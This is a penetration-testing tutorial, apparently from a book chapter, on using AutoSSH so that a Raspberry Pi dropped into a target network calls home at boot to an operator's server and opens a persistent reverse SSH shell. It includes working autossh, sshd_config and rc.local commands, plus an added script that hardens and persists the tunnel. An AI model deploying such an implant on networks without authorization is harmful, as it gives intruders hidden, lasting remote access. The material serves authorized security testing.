Using AutoSSH for reverse shell

For a persistent reverse SSH connection, you can use AutoSSH to set up an SSH session over a wired connection on the target network, or, if you have taken the time to set up a 3G connection over USB, it can run completely wireless. AutoSSH is a package that creates persistent outbound SSH connections from the Raspberry Pi to a server that you control somewhere on the Internet, and restarts the session whenever it drops. When the Raspberry Pi boots and has a network connection, wired or 3G, it automatically calls home and establishes a secure session to that server, which you then use to reach the Raspberry Pi.

Follow this example to install and configure AutoSSH on your Kali instance. Once it is in place, you can reach the Raspberry Pi and carry out your attacks from a remote location.

  • To begin, install AutoSSH on your Raspberry Pi. This can, and should, be done before using it for your penetration test. Use the apt-get command to install the latest version of autossh from the repository:
    #apt-get install autossh
    
To set up AutoSSH, we'll need to make configuration changes on both sides: the Raspberry Pi and the server side where you will be controlling the remote device from.

  1. To begin, we need a public key that the server will accept for authentication. If you've followed these steps so far, you'll remember that we regenerated new SSH keys after we "imaged" the box. Those are the host keys in /etc/ssh (for example /etc/ssh/ssh_host_rsa_key.pub), which identify the Raspberry Pi when something connects to it; the ssh client does not present them when it connects out. For the outbound tunnel, generate a key pair for root on the Raspberry Pi with ssh-keygen, leaving the passphrase empty because nothing will be there to type it at boot; for an RSA key the public half lands in ~/.ssh/id_rsa.pub. Cat this file and grab the whole line, starting with ssh-rsa through the trailing user@host comment.
  2. Copy it to Notepad so it can be pasted into your remote server to authorize the SSH session.
  3. Now, connect to the server in the cloud from which you will control the Raspberry Pi. The example host is called lambda. On this host, add the public key to the end of the authorized_keys file in the ~/.ssh/ directory of the account the tunnel will log in as (root, in this example). To accomplish this, switch to this directory and then add the key using the echo command. If the directory or file is new, make sure ~/.ssh is mode 700 and authorized_keys is mode 600; sshd ignores an authorized_keys file that other users can write to.

    Note

    Make sure that you use two greater than symbols to append to the end of the file and avoid overwriting the file completely.

  4. To enable the reverse shell, we need to make some changes to the SSHD configuration file on the server. Here is a summary of the two settings we will change on the SSH daemon:

    AllowTcpForwarding (yes)

    Lets an SSH session request port forwarding. This is how the tunnel from the Raspberry Pi asks the server to listen on a port and hand the connections it receives back through the session. OpenSSH enables it by default, but hardened servers often switch it off.

    GatewayPorts (yes)

    When a remote forward is set up, the default behavior is for the server to listen only on the loopback address (127.0.0.1), so only logins on the server itself can reach the forwarded port. This option makes the forwarded port listen on all of the server's interfaces, so you can connect to the reverse shell from off-box, say, from your laptop. Be aware that it also exposes the port to anyone who can reach the server; firewall it, or use the value clientspecified, which lets the -R option on the Raspberry Pi choose the address the port binds to.

  5. Change directory to /etc/ssh and locate your sshd_config file.

We will use the same echo technique to append the two lines to this file, with one caveat: sshd honours the first value it finds for a keyword, and anything appended after a Match block applies only to that block. Check that neither keyword is already set higher up in the file (or print the effective settings with sshd -T) before relying on a blind append.

  1. After the two lines are added to the sshd_config file, you will need to restart the SSHD service:
    #cd /etc/ssh
    #echo "AllowTCPForwarding yes" >> sshd_config
    #echo "GatewayPorts yes" >> sshd_config
    #service ssh restart
    

    The restart should complete without reporting a problem. If it reports an error in sshd_config, fix the file before continuing, because sshd will not start on a bad configuration.
  2. Returning to the Raspberry Pi, execute the autossh command, which builds the outbound tunnel and binds it to your server in the cloud:
    #autossh -M 10000 -N -f -R 1337:localhost:22 root@lambda
    
    In this example, -M is the monitoring port: autossh sets up a loop through the tunnel using this port and the one above it, sends test data around the loop, and restarts ssh when the data stops coming back. -N tells ssh not to execute a remote command, and -f tells autossh to drop into the background. Note that autossh backgrounds itself before ssh starts, so ssh cannot prompt for a password or passphrase; the key must work unattended. -R 1337:localhost:22 asks the server to listen on port 1337 and to forward every connection it receives there back through the tunnel to port 22, the default SSH port, on the Raspberry Pi (localhost is read from the Raspberry Pi's point of view). The last parameter tells it to connect to our remote host using the root account.

    This information should be changed to reflect the IP or hostname where your server is running.

    -M 10000            Monitoring port through which autossh checks that the tunnel is alive
    -N                  Do not execute a remote command; carry the forward only
    -f                  Run in the background
    1337:localhost:22   Remote forward: port 1337 on the server to port 22 (the default SSH port) on the Raspberry Pi
    user@host           The user and the IP address or hostname of the remote server

  3. Now, on your server in the cloud, SSH to the local port you created, 1337 in this example, using the -p flag, logging in as the Raspberry Pi's root account; the server only relays the connection to the reverse shell sent by the Raspberry Pi. On first use, ssh shows the host key fingerprint of whatever answers on that port; compare it with the fingerprint of the Raspberry Pi's own host key (which ssh-keygen prints with its -l option) before accepting it. This shell is more interactive than the netcat shell we had earlier, since it is a full SSH session, which is a real advantage if you do this frequently with the Raspberry Pi during penetration tests.
  4. Finally, add this to the /etc/rc.local file so that every time the Raspberry Pi boots, the session is established. To complete this task, you will need a text editor, such as vi or nano. The rc.local file ends with an exit 0 line, which must remain the last item; this prevents us from just appending to the end of the file, as we did in the previous examples:
    #vi /etc/rc.local
    
  5. Scroll down to the line before exit 0. Press i to insert a line and paste the autossh command you generated previously. Press Esc to leave insert mode, and finally, enter :wq to write the file and quit. Because rc.local runs as root at boot, before anyone is logged in, the key must have no passphrase; and because the network may not be fully up when it runs, put AUTOSSH_GATETIME=0 in front of the command so that a quick failure on the first attempt is retried rather than making autossh give up.

If you need the tunnel to survive a flaky link, pass the ssh options ServerAliveInterval and ServerAliveCountMax (with -o, which autossh hands through to ssh). They make ssh send keepalive probes through the tunnel, which both stops an idle connection from being dropped by a NAT device or firewall between the Raspberry Pi and the remote server and makes ssh exit once the server stops answering, so autossh notices and reconnects. Consider ExitOnForwardFailure yes as well: without it, a reconnect whose -R port is still held by the previous session's sshd succeeds as a plain login with no tunnel, and autossh never restarts it.
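The procedure above does its configuration edits with blind appends and starts the tunnel with the bare autossh line. The following script, an added example rather than the book's own code, shows the same three steps done so that they can be re-run safely: it sets a keyword in sshd_config where sshd will actually honour it (the first value wins, and anything after a Match block is scoped to that block), composes the autossh command line with the keepalive and forward-failure options just discussed, and inserts that line into rc.local ahead of the closing exit 0 only if it is not already there. It uses -M 0 in place of the monitoring port, the alternative the autossh manual page offers when the ServerAlive options are in use. The helper names, the sample sshd_config and rc.local contents, the key path /root/.ssh/id_ed25519 and the specific option values are assumptions made for the example; everything runs against constructed files in a temporary directory, not against a live server.

```shell
#!/bin/sh
# Added example, not the book's code. Idempotent versions of the edits the
# procedure makes with "echo >>", plus a hardened autossh command line.
# Everything here runs against constructed files in a temp directory.
# Assumed (not from the page): helper names, sample file contents, the key
# path /root/.ssh/id_ed25519 and the option values on the autossh line.

# sshd honours the FIRST value it sees for a keyword, and anything that
# follows a "Match" line applies only inside that Match block. So: drop any
# existing copy of the keyword (active or commented out) from the global
# section and place the new line before the first Match block, or at the
# end of the file if there is none.
set_sshd_option() {
    file=$1 key=$2 value=$3
    awk -v k="$(printf '%s' "$key" | tr 'A-Z' 'a-z')" -v line="$key $value" '
        !inmatch && tolower($1) == "match" { if (!done) { print line; done = 1 }; inmatch = 1 }
        !inmatch && (tolower($1) == k || tolower($1) == "#" k) { next }
        { print }
        END { if (!done) print line }
    ' "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# The value sshd will actually use for a keyword: the first active line in
# the global section. Use it to verify an edit (on a real server, "sshd -T"
# prints the complete effective configuration).
sshd_effective() {
    awk -v k="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        tolower($1) == "match" { exit }
        tolower($1) == k { print $2; exit }
    ' "$1"
}

# The autossh line from the procedure with the options a persistent reverse
# tunnel needs in practice (-o options are passed straight through to ssh):
#   -i KEY                    the client does not use the host key by
#                             default; name the key that was authorized
#   -M 0                      no monitor port; the keepalives below make
#                             ssh exit when the link dies
#   ServerAliveInterval=30    probe the server every 30 s ...
#   ServerAliveCountMax=3     ... and exit after 3 unanswered probes, so
#                             autossh reconnects within about 90 s
#   ExitOnForwardFailure=yes  if the remote port is still held by a stale
#                             session, fail (and retry) instead of staying
#                             logged in with no tunnel
#   AUTOSSH_GATETIME=0        at boot the network may not be up yet; do not
#                             treat a quick first failure as fatal
autossh_cmdline() {
    remote_port=$1 server=$2 key=$3
    printf 'AUTOSSH_GATETIME=0 autossh -M 0 -N -f -i %s -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 -R %s:localhost:22 %s' \
        "$key" "$remote_port" "$server"
}

# Insert CMD into rc.local just before the final "exit 0" (which must stay
# the last line), and do nothing if that exact line is already present.
add_to_rc_local() {
    file=$1 cmd=$2
    grep -qxF -- "$cmd" "$file" && return 0
    awk -v cmd="$cmd" '
        { buf[NR] = $0; if ($0 ~ /^[[:space:]]*exit[[:space:]]+0[[:space:]]*$/) last = NR }
        END {
            for (i = 1; i <= NR; i++) { if (i == last) print cmd; print buf[i] }
            if (!last) print cmd
        }
    ' "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# Demo with constructed files, loosely modelled on a Debian default config.
demo() {
    dir=$(mktemp -d)
    cat > "$dir/sshd_config" <<'EOF'
Port 22
#AllowTcpForwarding yes
GatewayPorts no
PasswordAuthentication no
Match User backup
    AllowTcpForwarding no
EOF
    printf '#!/bin/sh\n# constructed rc.local\nexit 0\n' > "$dir/rc.local"
    set_sshd_option "$dir/sshd_config" GatewayPorts yes
    set_sshd_option "$dir/sshd_config" AllowTcpForwarding yes
    add_to_rc_local "$dir/rc.local" "$(autossh_cmdline 1337 root@lambda /root/.ssh/id_ed25519)"
    echo "GatewayPorts is now: $(sshd_effective "$dir/sshd_config" GatewayPorts)"
    cat "$dir/sshd_config" "$dir/rc.local"
    rm -rf "$dir"
}
demo
```

On a real server, run sshd -t after set_sshd_option and before restarting the service; the script deliberately does not call it, because the sample file has no host keys for sshd to check. Note that the Match block's own AllowTcpForwarding no survives the edit untouched: the global setting only governs sessions the Match block does not cover.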

Since we enabled GatewayPorts earlier in the SSHD configuration file, you can also connect to this shell directly from your laptop, SSHing to the IP address or hostname of your server followed by the port you specified. The username is still the Raspberry Pi's root account; lambda only supplies the address. In this case, this would look like the following command:

#ssh root@lambda -p 1337

Because that port now listens on the server's public address, keep the Raspberry Pi's sshd on key-based authentication only and restrict port 1337 at the server's firewall to the addresses you will connect from.